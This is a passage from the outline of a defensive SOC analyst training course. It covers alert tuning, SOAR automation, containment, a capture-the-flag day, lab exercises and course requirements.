vi. Regular expressions
vii. Common matching and rule logic options
viii. Analytic generalization and sharing with Sigma
d. Tuning and False Positive Reduction
i. Dealing with alerts and runaway alert queues
ii. How many analysts should you have?
iii. Types of poor alerts
iv. Tuning strategy for poor alert types
v. Tuning via log field analysis
vi. Using policy to raise fidelity
vii. Sensitivity vs. specificity
viii. Automation and fast lanes
e. Automation and Orchestration
i. The definition of automation vs. orchestration
ii. What is SOAR?
iii. SOAR product considerations
iv. Common SOAR use cases
v. Enumeration and enrichment
vi. Response actions
vii. Alert and case management
viii. The paradox of automation
ix. DIY scripting
f. Improving Operational Efficiency and Workflow
i. Micro-automation
ii. Form filling
iii. Text expanders
iv. Email templates
v. Smart keywords
vi. Browser plugins
vii. Text caching
viii. JavaScript page modification
ix. OS Scripting
g. Containing Identified Intrusions
i. Containment and analyst empowerment
ii. Isolation options across network layers - physical, link, network, transport, application
iii. DNS firewalls, HTTP blocking and containment, SMTP, Web Application Firewalls
iv. Host-based containment tools
h. Skill and Career Development
i. Learning through conferences, capture-the-flag challenges, and podcasts
ii. Home labs
iii. Writing and public speaking
iv. Techniques for mastery and continual progress

—----------------------------------------------------------------------------------
Capture The Flag
Using network data and logs from a simulated network under attack, we provide a full day of hands-on work applying the principles taught throughout the course. You will be challenged to detect and identify attacks and to progress through multiple categories of questions designed to ensure mastery of the concepts and data covered during the course.

—----------------------------------------------------------------------------------

Course Exercises
● TheHive Incident Management System
● MISP Threat Intelligence Platform
● SIEM with the Elastic Stack and Splunk
● Exploring DNS
● HTTP and HTTPS Analysis
● SMTP and Email Analysis
● Interpreting Windows Logs
● Log Enrichment and Visualization
● Malicious File Identification
● Alert Triage and Prioritization
● Structured Analytical Challenge
● Collecting and Documenting Incident Information
● Alert Tuning
● Security Automation
● Incident Containment
● TryHackMe SOC Level

Requirements

  • There are no prerequisites, as the diploma takes you from beginner to professional, but a good background in networking and programming is an advantage.
  • You must own a computer.
  • You must be patient.